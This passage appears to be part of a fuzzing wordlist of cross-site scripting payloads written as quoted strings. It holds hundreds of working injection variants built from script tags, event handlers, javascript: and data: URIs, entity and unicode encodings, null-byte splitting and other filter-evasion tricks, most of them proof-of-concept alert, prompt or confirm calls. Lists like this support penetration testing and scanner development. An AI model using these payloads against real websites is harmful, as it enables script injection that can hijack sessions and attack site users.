toString:[].join,0:\'javascript:prompt%281%29?,length:1}</script>', "</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", "'><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", "</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", '<script>alert`1`</script>', '</ScrIpt><script>alert`1`</script>', '"><script>alert`1`</script>', '</ScrIpt><script>alert`1`</script>', "'><script>alert`1`</script>", '</ScrIpt><script>alert`1`</script>', '<svg><script>prompt(1)<p', '"><svg><script>prompt(1)<p', "'><svg><script>prompt(1)<p", '<div/onmouseover=confirm(1)>div</div', '"><div/onmouseover=confirm(1)>div</div', "'><div/onmouseover=confirm(1)>div</div", '<input onresize=alert(1)>', '"><input onresize=alert(1)>', "'><input onresize=alert(1)>", '<input onActivate=alert(1) autofocus>', '"><input onActivate=alert(1) autofocus>', "'><input onActivate=alert(1) autofocus>", '<input onBeforeActivate=alert(1) autofocus>', '"><input onBeforeActivate=alert(1) autofocus>', "'><input onBeforeActivate=alert(1) autofocus>", '<input type="hidden" accesskey="X" onclick="alert(1)">', '"><input type="hidden" accesskey="X" onclick="alert(1)">', '\'><input type="hidden" accesskey="X" onclick="alert(1)">', '<script>a= {get[alert`1`](){}}</script>', '</ScrIpt><script>a= {get[alert`1`](){}}</script>', '"><script>a= {get[alert`1`](){}}</script>', '</ScrIpt><script>a= {get[alert`1`](){}}</script>', "'><script>a= {get[alert`1`](){}}</script>", '</ScrIpt><script>a= {get[alert`1`](){}}</script>', '<script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '"><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', "'><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>", '</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '<script/src=data:,alert(1)>', '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)></script>", '"><script/src=data:,alert(1)>', '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)></script>", "'><script/src=data:,alert(1)>", '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)></script>", '<input/autofocus/onfocus=alert(1)>', '"><input/autofocus/onfocus=alert(1)>', "'><input/autofocus/onfocus=alert(1)>", '</script><svg><script>alert(1)+&quot;', '"></script><svg><script>alert(1)+&quot;', "'></script><svg><script>alert(1)+&quot;", '<script/src=data:,alert(1)>', '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)>", '<marquee/onstart=alert(1)>', '"><marquee/onstart=alert(1)>', "'><marquee/onstart=alert(1)>", '<video/poster/onerror=alert(1)>', '"><video/poster/onerror=alert(1)>', "'><video/poster/onerror=alert(1)>", '<isindex/autofocus/onfocus=alert(1)>', '"><isindex/autofocus/onfocus=alert(1)>', "'><isindex/autofocus/onfocus=alert(1)>", '<body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">', '"><body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">', '\'><body onload="$})}}}});alert(1);({0:{0:{0:function(){0({">', '<iframe name=alert(1) src="//x?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', '"><iframe name=alert(1) src="//x?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', '\'><iframe name=alert(1) src="//x?x=\',__defineSetter__(\'x\',eval),x=name,\'"></iframe>', '\';alert(String.fromCharCode(88,83,83))//\';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>', '">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', '"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', "'></plaintext\\></|\\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><img src="http: //i.imgur.com/P8mL8.jpg?>', '" onclick=alert(1)//<button ? onclick=alert(1)//> */ alert(1)//', 'javascript:confirm(1)', 'javascript:confirm(1);', 'javascript:alert(1)', 'javascript:alert(1);', 'avascript&#00058;alert(1)', 'javaSCRIPT&colon;alert(1)', 'JaVaScRipT:alert(1)', 'javas&Tab;cript:\\u0061lert(1);', 'javascript:\\u0061lert&#x28;1&#x29', 'javascript&#x3A;alert&lpar;1&rpar;', 'javascript&colon;alert(1)', 'javascript&#x3A;alert(1)', 'j&#x61;v&#x41;sc&#x52;ipt&#x3A;alert(1)', 'j&#x61;v&#x41;sc&#x52;ipt&#x3A;al&#x65;rt&lpar;1&rpar;', 'vbscript:alert(1);', 'vbscript&#00058;alert(1);', 'vbscr&Tab;ipt:alert(1)"', '<iframesrc="javascript:alert(2)">', '"><iframesrc="javascript:alert(2)">', '\'><iframesrc="javascript:alert(2)">', '<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<isindexformaction="javascript:alert(1)" type=image>', '"><isindexformaction="javascript:alert(1)" type=image>', '\'><isindexformaction="javascript:alert(1)" type=image>', '<input type="image" formaction=JaVaScript:alert(0)>', '"><input type="image" formaction=JaVaScript:alert(0)>', '\'><input type="image" formaction=JaVaScript:alert(0)>', '<form><button formaction=javascript&colon;alert(1)>CLICKME', '"><form><button formaction=javascript&colon;alert(1)>CLICKME', "'><form><button formaction=javascript&colon;alert(1)>CLICKME", '<form action="Javascript:alert(1)"><input type=submit>', '"><form action="Javascript:alert(1)"><input type=submit>', '\'><form action="Javascript:alert(1)"><input type=submit>', '<isindex action="javascript:alert(1)" type=image>', '"><isindex action="javascript:alert(1)" type=image>', '\'><isindex action="javascript:alert(1)" type=image>', '<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>', '"><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>', "'><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>", '<isindex action=data:text/html, type=image>', '"><isindex action=data:text/html, type=image>', "'><isindex action=data:text/html, type=image>", '?/><marquee onfinish=confirm(1)>a</marquee>', '<object data=\'data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>\'>', '"><object data=\'data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>\'>', '\'><object data=\'data:text/xml,<script xmlns="http://www.w3.org/1999/xhtml ">confirm(1)</script>>\'>', '<img src= "a" onerror= \'eval(atob("cHJvbXB0KDEpOw=="))\'', '"><img src= "a" onerror= \'eval(atob("cHJvbXB0KDEpOw=="))\'', '\'><img src= "a" onerror= \'eval(atob("cHJvbXB0KDEpOw=="))\'', "<script>alert('X')</script>=a", "</ScrIpt><script>alert('X')</script>=a", '"><script>alert(\'X\')</script>=a', "</ScrIpt><script>alert('X')</script>=a", "'><script>alert('X')</script>=a", "</ScrIpt><script>alert('X')</script>=a", '<script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '"><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '\'><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '</ScrIpt><script>document.write(toStaticHTML("<style>div{font-family:rgb(\'0,0,0)\'\'\'}foo\');color=expression(alert(1));{}</style><div>POC</div>"))</script>', '\';!--"<XSS><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>={()}', '<script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '"><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '\'><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', '</ScrIpt><script>document.body.innerHTML="<a onmouseover%0B=location=\'\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x61\\x6C\\x65\\x72\\x74\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B\'><input name=attributes>";</script>', 'asfunction:getURL,javascript:alert(1)//', '\\%22))}catch(e){}if(!self.a)self.a=!alert(1)//', '"]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//', '0%5C"))%7Dcatch(e)%7Bif(!window.x)%7Bwindow.x=1;alert(1)%7D%7D//', '<button/onclick=alert(1) >X</button>', '"><button/onclick=alert(1) >X</button>', "'><button/onclick=alert(1) >X</button>", '<a onmouseover=(alert(1))>X</a>', '"><a onmouseover=(alert(1))>X</a>', "'><a onmouseover=(alert(1))>X</a>", '<p/onmouseover=javascript:alert(1); >X</p>', '"><p/onmouseover=javascript:alert(1); >X</p>', "'><p/onmouseover=javascript:alert(1); >X</p>", '<article xmlns="><img src=x onerror=alert(1)"></article>', '"><article xmlns="><img src=x onerror=alert(1)"></article>', '\'><article xmlns="><img src=x onerror=alert(1)"></article>', '<article xmlns="x:img src=x onerror=alert(1) ">', '"><article xmlns="x:img src=x onerror=alert(1) ">', '\'><article xmlns="x:img src=x onerror=alert(1) ">', '<p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '"><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '\'><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '<listing>&ltimg src=x onerror=alert(1)&gt</listing>', '"><listing>&ltimg src=x onerror=alert(1)&gt</listing>', "'><listing>&ltimg src=x onerror=alert(1)&gt</listing>", '"onmouseover=alert(1);a="', "'+alert(1)&&null=='", "+alert(1)&&null=='", "\\\\\\'><script>1<\\\\/script>", "\\\\\\'><body onload=\\\\\\'1\\\\\\'>", '\\"><script>1<\\\\/script>', '><script>1<\\\\/script>', '\\"><body onload=\\"1\\">', '<img src=\\"x:X\\" onerror=\\"alert(1)\\">', '"><img src=\\"x:X\\" onerror=\\"alert(1)\\">', '\'><img src=\\"x:X\\" onerror=\\"alert(1)\\">', '<img src=a onerror=alert(1)', '"><img src=a onerror=alert(1)', "'><img src=a onerror=alert(1)", "<script>alert(\\'1\\')</script>", "</ScrIpt><script>alert(\\'1\\')</script>", '"><script>alert(\\\'1\\\')</script>', "</ScrIpt><script>alert(\\'1\\')</script>", "'><script>alert(\\'1\\')</script>", "</ScrIpt><script>alert(\\'1\\')</script>", "<script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", '"><script>alert(\\\'\\\\\\\\1\\\\\\\\\\\')</script>', "</ScrIpt><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "'><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\\\\\1\\\\\\\\\\')</script>", "<script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", '"><script>alert(\\\'\\\\/\\\\1\\\\/\\\\\\\')</script>', "</ScrIpt><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", "'><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", "</ScrIpt><script>alert(\\'\\\\/\\\\1\\\\/\\\\\\')</script>", '\\\'\\\'\\">', '<scri%00pt>alert(1);</scri%00pt>', '"><scri%00pt>alert(1);</scri%00pt>', "'><scri%00pt>alert(1);</scri%00pt>", '<scri\\x00pt>alert(1);</scri%00pt>', '"><scri\\x00pt>alert(1);</scri%00pt>', "'><scri\\x00pt>alert(1);</scri%00pt>", '<s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>', '"><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>', "'><s%00c%00r%00%00ip%00t>confirm(1);</s%00c%00r%00%00ip%00t>", '<script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '<%0ascript>alert(1);</script>', '"><%0ascript>alert(1);</script>', "'><%0ascript>alert(1);</script>", '<%0bscript>alert(1);</script>', '"><%0bscript>alert(1);</script>', "'><%0bscript>alert(1);</script>", '<SCRIPT> alert(\\"1\\");</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\");</SCRIPT>', '"><SCRIPT> alert(\\"1\\");</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\");</SCRIPT>', '\'><SCRIPT> alert(\\"1\\");</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\");</SCRIPT>', '<SCRIPT> alert(\\"1\\")</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\")</SCRIPT>', '"><SCRIPT> alert(\\"1\\")</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\")</SCRIPT>', '\'><SCRIPT> alert(\\"1\\")</SCRIPT>', '</ScrIpt><SCRIPT> alert(\\"1\\")</SCRIPT>', '<script>alert([!![]] [])</script>', '</ScrIpt><script>alert([!![]] [])</script>', '"><script>alert([!![]] [])</script>', '</ScrIpt><script>alert([!![]] [])</script>', "'><script>alert([!![]] [])</script>", '</ScrIpt><script>alert([!![]] [])</script>', '<var onmouseover="prompt(1)">X</var>', '"><var onmouseover="prompt(1)">X</var>', '\'><var onmouseover="prompt(1)">X</var>', '%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80?', '<input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>', '"><input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>', '\'><input type="text" value=``<div/onmouseover=\'alert(1)\'>X</div>', '<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?', '"><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?', "'><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?", '<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>', '"><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>', "'><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>", '<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?', '"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?', '\'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?', '<embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/flash.swf" allowscriptaccess=always>?', "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '"><script>~\'\\u0061\' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~\'\\u0061\')</script U+', "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "'><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', '"><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script ????????????", '"><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', '"><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script ????????????", "'><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script", '"><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script ????????????", '<script itworksinallbrowsers>/*<script* */alert(1)</script', '"><script itworksinallbrowsers>/*<script* */alert(1)</script', "'><script itworksinallbrowsers>/*<script* */alert(1)</script ?", '"><script itworksinallbrowsers>/*<script* */alert(1)</script ?', "'><script itworksinallbrowsers>/*<script* */alert(1)</script ?", '<img src ?itworksonchrome?\\/onerror = alert(1)', '"><img src ?itworksonchrome?\\/onerror = alert(1)', "'><img src ?itworksonchrome?\\/onerror = alert(1)???", '"><img src ?itworksonchrome?\\/onerror = alert(1)???', "'><img src ?itworksonchrome?\\/onerror = alert(1)???", '<meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">', '"><meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">', '\'><meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">', '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe', '"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe', "'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe", '<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', '"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', "'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?", '"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', 